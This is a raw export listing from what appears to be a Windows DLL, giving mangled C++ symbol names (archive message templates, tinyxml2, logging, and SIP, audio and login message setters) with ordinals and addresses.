              ?SetItem5@?$CmmMessageTemplate_5@IHIHI@Archive@Cmm@@QAEXABI@Z47020x4185e0
              ?SetItem5@?$CmmMessageTemplate_5@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z47030x419fd0
              ?SetItem5@?$CmmMessageTemplate_5@IV?$CStringT@_W@Cmm@@IV12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47040x41a720
              ?SetItem5@?$CmmMessageTemplate_5@IV?$CStringT@_W@Cmm@@V12@V12@I@Archive@Cmm@@QAEXABI@Z47050x418d20
              ?SetItem5@?$CmmMessageTemplate_5@IV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47060x418bb0
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@HHV12@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z47070x41cc70
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@HV12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z47080x41d340
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@HV12@V12@_J@Archive@Cmm@@QAEXAB_J@Z47090x41dc00
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@IHV12@I@Archive@Cmm@@QAEXABI@Z47100x41af30
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@IIIH@Archive@Cmm@@QAEXABH@Z47110x419ad0
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V12@IV12@_J@Archive@Cmm@@QAEXAB_J@Z47120x41dc00
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V12@V12@HH@Archive@Cmm@@QAEXABH@Z47130x418d20
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z47140x41bde0
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@V32@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47150x418120
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@_JV12@HV12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z47160x41d930
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@HHHH@Archive@Cmm@@QAEXABH@Z47170x419ad0
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@HIIV12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47180x41b460
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@IHIH@Archive@Cmm@@QAEXABH@Z47190x419ad0
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@IV12@V12@I@Archive@Cmm@@QAEXABI@Z47200x418d20
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@IV12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47210x418bb0
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@HHH@Archive@Cmm@@QAEXABH@Z47220x41af30
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@HV12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47230x418bb0
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@HV12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47240x418bb0
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@IH@Archive@Cmm@@QAEXABH@Z47250x418d20
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@II@Archive@Cmm@@QAEXABI@Z47260x418d20
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@V12@H@Archive@Cmm@@QAEXABH@Z47270x417f60
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47280x418120
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@V12@V12@V?$CStringT@D@2@H@Archive@Cmm@@QAEXABH@Z47290x417f60
              ?SetItem5@?$CmmMessageTemplate_5@V?$CStringT@_W@Cmm@@_J_JV12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47300x419380
              ?SetItem5@?$CmmMessageTemplate_5@_JV?$CStringT@D@Cmm@@IV12@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z47310x41d930
              ?SetItem5@?$CmmMessageTemplate_5@_JV?$CStringT@D@Cmm@@V12@_JV12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z47320x41d930
              ?SetItem5@?$CmmMessageTemplate_5@_JV?$CStringT@_W@Cmm@@V12@V12@I@Archive@Cmm@@QAEXABI@Z47330x41a920
              ?SetItem5@?$CmmMessageTemplate_5@_JV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47340x41a000
              ?SetItem6@?$CmmMessageTemplate_6@HHHHV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47350x419b00
              ?SetItem6@?$CmmMessageTemplate_6@HHHV?$CStringT@_W@Cmm@@V12@H@Archive@Cmm@@QAEXABH@Z47360x41af50
              ?SetItem6@?$CmmMessageTemplate_6@HHHV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47370x421290
              ?SetItem6@?$CmmMessageTemplate_6@HV?$CStringT@D@Cmm@@IIII@Archive@Cmm@@QAEXABI@Z47380x41f790
              ?SetItem6@?$CmmMessageTemplate_6@HV?$CStringT@D@Cmm@@V12@V12@HV12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z47390x424460
              ?SetItem6@?$CmmMessageTemplate_6@HV?$CStringT@_W@Cmm@@V12@V12@HH@Archive@Cmm@@QAEXABH@Z47400x4191d0
              ?SetItem6@?$CmmMessageTemplate_6@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47410x41a000
              ?SetItem6@?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@IV12@V12@H@Archive@Cmm@@QAEXABH@Z47420x4191d0
              ?SetItem6@?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@V12@V12@II@Archive@Cmm@@QAEXABI@Z47430x4191d0
              ?SetItem6@?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47440x419880
              ?SetItem6@?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@V12@V12@V12@_J@Archive@Cmm@@QAEXAB_J@Z47450x422e60
              ?SetItem6@?$CmmMessageTemplate_6@V?$CStringT@D@Cmm@@HV12@V12@V12@H@Archive@Cmm@@QAEXABH@Z47460x41d360
              ?SetItem6@?$CmmMessageTemplate_6@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z47470x41be00
              ?SetItem6@?$CmmMessageTemplate_6@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@V32@V32@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47480x418140
              ?SetItem6@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@HHHHH@Archive@Cmm@@QAEXABH@Z47490x41f790
              ?SetItem6@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@HIIV12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47500x421290
              ?SetItem6@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@IHIHV12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47510x419b00
              ?SetItem6@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@IV12@V12@II@Archive@Cmm@@QAEXABI@Z47520x4191d0
              ?SetItem6@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J@Archive@Cmm@@QAEXAB_J@Z47530x422e60
              ?SetItem6@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@HHHH@Archive@Cmm@@QAEXABH@Z47540x41af50
              ?SetItem6@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@V12@V12@HH@Archive@Cmm@@QAEXABH@Z47550x41d360
              ?SetItem6@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@H@Archive@Cmm@@QAEXABH@Z47560x425a50
              ?SetItem6@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47570x418140
              ?SetItem6@?$CmmMessageTemplate_6@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47580x4193b0
              ?SetItem6@?$CmmMessageTemplate_6@_JV?$CStringT@D@Cmm@@IV12@V12@H@Archive@Cmm@@QAEXABH@Z47590x41f220
              ?SetItem6@?$CmmMessageTemplate_6@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z47600x420a00
              ?SetItem6@?$CmmMessageTemplate_6@_JV?$CStringT@_W@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47610x41a030
              ?SetItem7@?$CmmMessageTemplate_7@HHHHV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47620x41af80
              ?SetItem7@?$CmmMessageTemplate_7@HHHV?$CStringT@_W@Cmm@@V12@HV12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47630x41af80
              ?SetItem7@?$CmmMessageTemplate_7@HHHV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47640x4212b0
              ?SetItem7@?$CmmMessageTemplate_7@HV?$CStringT@D@Cmm@@V12@V12@HV12@H@Archive@Cmm@@QAEXABH@Z47650x41f240
              ?SetItem7@?$CmmMessageTemplate_7@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47660x41a030
              ?SetItem7@?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@III@Archive@Cmm@@QAEXABI@Z47670x41c6f0
              ?SetItem7@?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@V12@V12@I@Archive@Cmm@@QAEXABI@Z47680x4193e0
              ?SetItem7@?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@V12@_JV12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47690x426c60
              ?SetItem7@?$CmmMessageTemplate_7@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z47700x41be20
              ?SetItem7@?$CmmMessageTemplate_7@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@V32@V32@V32@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47710x418170
              ?SetItem7@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@HHHHHH@Archive@Cmm@@QAEXABH@Z47720x4247c0
              ?SetItem7@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@HIIV12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47730x4212b0
              ?SetItem7@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IHIHV12@H@Archive@Cmm@@QAEXABH@Z47740x419b30
              ?SetItem7@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IV12@V12@II_J@Archive@Cmm@@QAEXAB_J@Z47750x422e60
              ?SetItem7@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_J@Archive@Cmm@@QAEXAB_J@Z47760x426200
              ?SetItem7@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@HHHHV12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47770x41af80
              ?SetItem7@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HH@Archive@Cmm@@QAEXABH@Z47780x4193e0
              ?SetItem7@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47790x418170
              ?SetItem7@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@H@Archive@Cmm@@QAEXABH@Z47800x4193e0
              ?SetItem7@?$CmmMessageTemplate_7@_JV?$CStringT@D@Cmm@@IV12@V12@HH@Archive@Cmm@@QAEXABH@Z47810x41f240
              ?SetItem7@?$CmmMessageTemplate_7@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z47820x420a20
              ?SetItem7@?$CmmMessageTemplate_7@_JV?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47830x418170
              ?SetItem8@?$CmmMessageTemplate_8@HHHV?$CStringT@_W@Cmm@@V12@HV12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47840x41b5b0
              ?SetItem8@?$CmmMessageTemplate_8@HHHV?$CStringT@_W@Cmm@@V12@V12@V12@H@Archive@Cmm@@QAEXABH@Z47850x425c20
              ?SetItem8@?$CmmMessageTemplate_8@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47860x418170
              ?SetItem8@?$CmmMessageTemplate_8@IV?$CStringT@_W@Cmm@@V12@V12@IIII@Archive@Cmm@@QAEXABI@Z47870x41afa0
              ?SetItem8@?$CmmMessageTemplate_8@IV?$CStringT@_W@Cmm@@V12@V12@V12@_JV12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47880x426c80
              ?SetItem8@?$CmmMessageTemplate_8@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z47890x41be40
              ?SetItem8@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@HIIV12@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47900x4212d0
              ?SetItem8@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IHIHV12@H_K@Archive@Cmm@@QAEXAB_K@Z47910x419b60
              ?SetItem8@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IV12@V12@II_JI@Archive@Cmm@@QAEXABI@Z47920x422e80
              ?SetItem8@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JH@Archive@Cmm@@QAEXABH@Z47930x426220
              ?SetItem8@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@HHHHV12@H@Archive@Cmm@@QAEXABH@Z47940x41afa0
              ?SetItem8@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47950x425a70
              ?SetItem8@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z47960x4181a0
              ?SetItem8@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@HH@Archive@Cmm@@QAEXABH@Z47970x419410
              ?SetItem8@?$CmmMessageTemplate_8@_JV?$CStringT@D@Cmm@@IV12@V12@HH_J@Archive@Cmm@@QAEXAB_J@Z47980x41f270
              ?SetItem8@?$CmmMessageTemplate_8@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z47990x420a40
              ?SetItem9@?$CmmMessageTemplate_9@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z48000x41a060
              ?SetItem9@?$CmmMessageTemplate_9@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@H@Archive@Cmm@@QAEXABH@Z48010x41be60
              ?SetItem9@?$CmmMessageTemplate_9@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z48020x41bfe0
              ?SetItem9@?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@IHIHV12@H_KH@Archive@Cmm@@QAEXABH@Z48030x419b90
              ?SetItem9@?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHH@Archive@Cmm@@QAEXABH@Z48040x426250
              ?SetItem9@?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z48050x41a060
              ?SetItem9@?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z48060x4181d0
              ?SetItem9@?$CmmMessageTemplate_9@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@V12@@Archive@Cmm@@QAEXABV?$CStringT@D@3@@Z48070x420a60
              ?SetLength@?$CStringT@D@Cmm@@QAEXI@Z48080x405930
              ?SetLength@?$CStringT@_W@Cmm@@QAEXI@Z48090x403ab0
              ?SetLogAssertHandler@logging@@YAXP6AXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z@Z48100x45e040
              ?SetLogDestination@logging@@YAXW4LoggingDestination@1@@Z48110x45e080
              ?SetLogItems@logging@@YAX_N000@Z48120x45e000
              ?SetLogMessageHandler@logging@@YAXP6A_NHPBDHIABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z@Z48130x45e060
              ?SetLogReportHandler@logging@@YAXP6AXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z@Z48140x45e050
              ?SetMetricsInfoAttribs@CCmmPerfTelemetry@@CAXAAUZClientPerfMetricsInfo_s@ZoomPTPAAP@@AAUPerfTelemetryStartEntry@1@@Z48150x467e70
              ?SetMinLogLevel@logging@@YAXH@Z48160x45df80
              ?SetMockTickFunction@TimeTicks@Cmm@@KAP6AKXZP6AKXZ@Z48170x451ce0
              ?SetMsgType@CmmInternelMsg@Cmm@@QAEXH@Z48180x45f5a0
              ?SetName@CCmmArchivePackageTree@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z48190x40c720
              ?SetName@CCmmArchiveTreeNode@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z48200x4587c0
              ?SetName@PlatformThread@@SAXPBD@Z48210x402f90
              ?SetName@XMLAttribute@tinyxml2@@AAEXPBD@Z48220x460fa0
              ?SetName@XMLElement@tinyxml2@@QAEXPBD_N@Z48230x454750
              ?SetObject@CCmmArchiveVarivant@Cmm@@QAEXPAVICmmRefableObject@2@@Z48240x459b40
              ?SetShowErrorDialogs@logging@@YAX_N@Z48250x45e030
              ?SetSize@CFile@Cmm@@QAEX_K@Z48260x411830
              ?SetStackThreshold@CCmmPerfTelemetry@@SAXK@Z48270x456490
              ?SetStr@StrPair@tinyxml2@@QAEXPBDH@Z48280x45fa70
              ?SetString@CCmmArchiveVarivant@Cmm@@QAEXPB_W@Z48290x459a80
              ?SetTestMode@Cmm@@YAXH@Z48300x402f90
              ?SetText@XMLElement@tinyxml2@@QAEXH@Z48310x4616b0
              ?SetText@XMLElement@tinyxml2@@QAEXI@Z48320x461700
              ?SetText@XMLElement@tinyxml2@@QAEXM@Z48330x461840
              ?SetText@XMLElement@tinyxml2@@QAEXN@Z48340x4618a0
              ?SetText@XMLElement@tinyxml2@@QAEXPBD@Z48350x461660
              ?SetText@XMLElement@tinyxml2@@QAEX_J@Z48360x461750
              ?SetText@XMLElement@tinyxml2@@QAEX_K@Z48370x4617a0
              ?SetText@XMLElement@tinyxml2@@QAEX_N@Z48380x4617f0
              ?SetTimer@CTimerID@Cmm@@QAEIIPAVCTimerProc@2@@Z48390x451f90
              ?SetUInt32@CCmmArchiveVarivant@Cmm@@QAEXI@Z48400x4599f0
              ?SetUInt64@CCmmArchiveVarivant@Cmm@@QAEX_K@Z48410x459b60
              ?SetUrgentEvent@CCmmPerfTelemetry@@SAXH@Z48420x4564f0
              ?SetUseLogService@logging@@YAX_N@Z48430x45e090
              ?SetUserData@XMLNode@tinyxml2@@QAEXPAX@Z48440x454480
              ?SetValue@XMLNode@tinyxml2@@QAEXPBD_N@Z48450x4604d0
              ?SetValueInSlot@ThreadLocalPlatform@internal@Cmm@@SAXAAKPAX@Z48460x45f250
              ?SetVersion@CCmmArchivePackageTree@Archive@Cmm@@QAEXH@Z48470x40c740
              ?SetWritten@CmmInternelMsg@Cmm@@QAEXI@Z48480x45bdb0
              ?Set_Accept@CSBMBMessage_VTLSConfirm@@QAEXABH@Z48490x41be60
              ?Set_Ack@CSBMBMessage_IGotIt@@QAEXABV?$CStringT@_W@Cmm@@@Z48500x40c890
              ?Set_Ack@CSBMBMessage_NotifyReceivedSelectMe@@QAEXABV?$CStringT@_W@Cmm@@@Z48510x40c890
              ?Set_Action@CSBMBMessage_AddClientLog@@QAEXABI@Z48520x40c800
              ?Set_ActionSource@CSBMBMessage_AddClientLog@@QAEXABI@Z48530x4193e0
              ?Set_ActionType@CSBMBMessage_Assistant_SIP_OnCallRecordingResultNotification@@QAEXABH@Z48540x417560
              ?Set_Active@CSBMBMessage_Assistant_SIP_WMIActive@@QAEXABH@Z48550x40c800
              ?Set_AdapterName@CSBMBMessage_NotifyNetworkSwitch@@QAEXABV?$CStringT@D@Cmm@@@Z48560x418370
              ?Set_AdditionalInfo@CSBMBMessage_UploadFeedback@@QAEXABV?$CStringT@_W@Cmm@@@Z48570x418940
              ?Set_AesIv@CSBMBMessage_Doc2ImgConvertProgress@@QAEXABV?$CStringT@_W@Cmm@@@Z48580x4212b0
              ?Set_AesKey@CSBMBMessage_Doc2ImgConvertProgress@@QAEXABV?$CStringT@_W@Cmm@@@Z48590x421290
              ?Set_Agree@CSBMBMessage_NotifyUpdateDisclaimerStatus@@QAEXABH@Z48600x418d20
              ?Set_App@CSBMBMessage_NotifyStartAppShare@@QAEXABV?$CStringT@_W@Cmm@@@Z48610x40c890
              ?Set_AppName@CSBMBMessage_InitThread@@QAEXABV?$CStringT@D@Cmm@@@Z48620x40c9b0
              ?Set_AppName@CSBMBMessage_NotifyAfterInit@@QAEXABV?$CStringT@D@Cmm@@@Z48630x40c9b0
              ?Set_AppName@CSBMBMessage_NotifyAfterObjCreated@@QAEXABV?$CStringT@D@Cmm@@@Z48640x40c9b0
              ?Set_AppName@CSBMBMessage_NotifyBeforeObjDestroyed@@QAEXABV?$CStringT@D@Cmm@@@Z48650x40c9b0
              ?Set_AppName@CSBMBMessage_NotifyBeforeTerm@@QAEXABV?$CStringT@D@Cmm@@@Z48660x40c9b0
              ?Set_AppName@CSBMBMessage_TermThread@@QAEXABV?$CStringT@D@Cmm@@@Z48670x40c9b0
              ?Set_ArchivingOption@CSBMBMessage_ConfirmConfLeave@@QAEXAB_K@Z48680x419c10
              ?Set_AudioCmdNotify@CSBMBMessage_Audio3rdSDK_AudioCmdNotify@@QAEXABV?$CStringT@_W@Cmm@@@Z48690x40c810
              ?Set_AudioCmdRequest@CSBMBMessage_Audio3rdSDK_AudioCmdRequest@@QAEXABV?$CStringT@_W@Cmm@@@Z48700x40c810
              ?Set_AudioDevType@CSBMBMessage_AudioFacilityStatus@@QAEXABH@Z48710x417bf0
              ?Set_AudioDevType@CSBMBMessage_OperateAudioFacilityParam@@QAEXABH@Z48720x417bf0
              ?Set_AudioOn@CSBMBMessage_CCIVideoMuteAudioRequest@@QAEXABH@Z48730x417560
              ?Set_AudioQuality@CSBMessage_Assistant_AudioQualityNotification@@QAEXABI@Z48740x40c800
              ?Set_B64PBUserProfile@CSBMBMessage_NotifyPTLoginInfo@@QAEXABV?$CStringT@D@Cmm@@@Z48750x419fd0
              ?Set_B64PZRUserProfile@CSBMBMessage_NotifyPTLoginInfo@@QAEXABV?$CStringT@D@Cmm@@@Z48760x41a090
              ?Set_B64String@CSBMBMessage_UpdateLaunchConfParam@@QAEXABV?$CStringT@D@Cmm@@@Z48770x40c9b0
              ?Set_BandwidthInfo@CSBMBMessage_NotifyBandwidthLimitUpdate@@QAEXABV?$CStringT@D@Cmm@@@Z48780x40c9b0
              ?Set_BeginTime@CSBMBMessage_NotifyChangeBargeEmergencyCallStatus@@QAEXAB_J@Z48790x41a8d0
              ?Set_BindPhoneURL@CSBMBMessage_RealNameAuthInfo@@QAEXABV?$CStringT@_W@Cmm@@@Z48800x418b80
              ?Set_Bssid@CSBMBMessage_Assistant_SIP_CheckNomadic911Request@@QAEXABV?$CStringT@D@Cmm@@@Z48810x40c9b0
              ?Set_CallID@CSBMBMessage_Assistant_SIP_CallOperationFailNotification@@QAEXABV?$CStringT@D@Cmm@@@Z48820x40c9b0
              ?Set_CallID@CSBMBMessage_Assistant_SIP_JoinMeetingRequest@@QAEXABV?$CStringT@D@Cmm@@@Z48830x40c9b0
              ?Set_CallID@CSBMBMessage_Assistant_SIP_OnCallMediaStatusUpdateNotification@@QAEXABV?$CStringT@D@Cmm@@@Z48840x40c9b0
              ?Set_CallID@CSBMBMessage_Assistant_SIP_OnCallRecordingResultNotification@@QAEXABV?$CStringT@D@Cmm@@@Z48850x40c9b0
              ?Set_CallID@CSBMBMessage_Assistant_SIP_OnCallRecordingStatusUpdateNotification@@QAEXABV?$CStringT@D@Cmm@@@Z48860x40c9b0
              ?Set_CallID@CSBMBMessage_Assistant_SIP_OnCallStatusUpdateNotification@@QAEXABV?$CStringT@D@Cmm@@@Z48870x40c9b0
              ?Set_CallID@CSBMBMessage_Assistant_SIP_OnCallTransferResultNotification@@QAEXABV?$CStringT@D@Cmm@@@Z48880x40c9b0
              ?Set_CallID@CSBMBMessage_Assistant_SIP_SwitchCallToCarrierResponse@@QAEXABV?$CStringT@D@Cmm@@@Z48890x418370
              ?Set_CallID@CSBMBMessage_Assistant_SIP_UpgradeToMeetingRequest@@QAEXABV?$CStringT@D@Cmm@@@Z48900x40c9b0
              ?Set_CallInfo@CSBMBMessage_Assistant_SIP_OnCallIncomingNotification@@QAEXABV?$CStringT@D@Cmm@@@Z48910x40c9b0
              ?Set_CallerID@CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotificationWithCallID@@QAEXABV?$CStringT@D@Cmm@@@Z48920x40c9b0
              ?Set_Callid@CSBMBMessage_Assistant_SIP_AutoRecordingEvent@@QAEXABV?$CStringT@D@Cmm@@@Z48930x40c9b0
              ?Set_Callid@CSBMBMessage_Assistant_SIP_ReceiveRealtimePolicesNotification@@QAEXABV?$CStringT@D@Cmm@@@Z48940x40c9b0
              ?Set_Callid@CSBMBMessage_Assistant_SIP_RemoteMergerEvent@@QAEXABV?$CStringT@D@Cmm@@@Z48950x40c9b0
              ?Set_Calloutnumber@CSBMBMessage_StartCallOutInfo@@QAEXABV?$CStringT@_W@Cmm@@@Z48960x40c890
              ?Set_Cancel@CSBMBMessage_NotifyUserInputProxyAuth@@QAEXABH@Z48970x4191d0
              ?Set_ChannelId@CSBMBMessage_Audio3rdSDK_AudioCmdNotify@@QAEXABI@Z48980x40c800
              ?Set_ChannelId@CSBMBMessage_Audio3rdSDK_AudioCmdRequest@@QAEXABI@Z48990x40c800
              ?Set_ChannelId@CSBMBMessage_Client3rdSDK_SDKCmdNotify@@QAEXABI@Z49000x40c800
              ?Set_ChannelId@CSBMBMessage_Client3rdSDK_SDKCmdRequest@@QAEXABI@Z49010x40c800
              ?Set_ChannelId@CSBMBMessage_LogService_StartChannel@@QAEXABI@Z49020x40c800
              ?Set_ChannelId@CSBMBMessage_LogService_StopChannel@@QAEXABI@Z49030x40c800
              ?Set_ChannelId@CSBMBMessage_LogService_SubChannelAdd@@QAEXABI@Z49040x40c800
              ?Set_ChannelId@CSBMBMessage_LogService_SubChannelRemove@@QAEXABI@Z49050x40c800
              ?Set_CheckResult@CSBMBMessage_CheckNomadic911_Notification@@QAEXABI@Z49060x40c800
              ?Set_ClientCred@CSBMBMessage_NotifyPTLoginInfo@@QAEXABV?$CStringT@_W@Cmm@@@Z49070x419fa0
              ?Set_ClientCredExpireTime@CSBMBMessage_NotifyPTLoginInfo@@QAEXAB_J@Z49080x419fb0
              ?Set_ClientID@CSBMBMessage_NotifyClientRegistry@@QAEXABV?$CStringT@D@Cmm@@@Z49090x40c9b0
              ?Set_ClientID@CSBMBMessage_NotifyClientUnRegistry@@QAEXABV?$CStringT@D@Cmm@@@Z49100x40c9b0
